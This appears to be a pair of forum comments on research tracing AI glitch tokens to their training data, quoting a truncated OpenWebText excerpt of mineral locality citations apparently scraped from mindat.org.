    Looks like scrapes from https://www.mindat.org/?

    Example text from OpenWebText:

    Lowville quartz locality Walter, M., Chamberlain, S.C. (2013) The Lowville quartz occurrence, Lewis County, NY. The 40th Rochester Mineralogical Symposium, Contributed Papers in Specimen Mineralogy, 29-30.\n\nNorth Carolina Gaston Co. ⓘ Crowders Mountain State Park Espenshade, Gilbert H. and Potter, Donald B. (1960) Kyanite,Sillimanite And Andalusite Deposits of the Southeastern States: Geological Survey Professional Paper 336\n\nOregon Lane Co. Black Butte District ⓘ Hobart Butte Am Min (1948) 33:122-134\n\nPennsylvania Schuylkill Co. New Castle Township ⓘ Wadesville Tom Loomis specimen; Alfredo Petrov specimens; Collected by James J. "Skip" Colflesh, 2007.\n\nUtah Beaver Co. San Francisco Mts ⓘ San Francisco District (Frisco District) Petersen, Erich U., (2001) Porphyry Cu-Style Mineralization Potential In The San Francisco District, Ut. GSA Annual Meeting, November 5-8, 2001\n\nJuab Co. East Tintic Mts Tintic District ⓘ Mintintic Mine American Mineralogist, Volume 30, pages 76-77\n\nⓘ White Hi', ' District NBMG Spec. Pub. 31 Minerals of Nevada\n\nNew Hampshire Ches


I laughed out loud at the SCP hypothesis. Love it. What a warped mirror the Shoggoths hold up to us, casting back unexpected pieces of our own behaviors in strange contexts.

Satisfying to see these glitch issues tracked down to their sources. Nice work.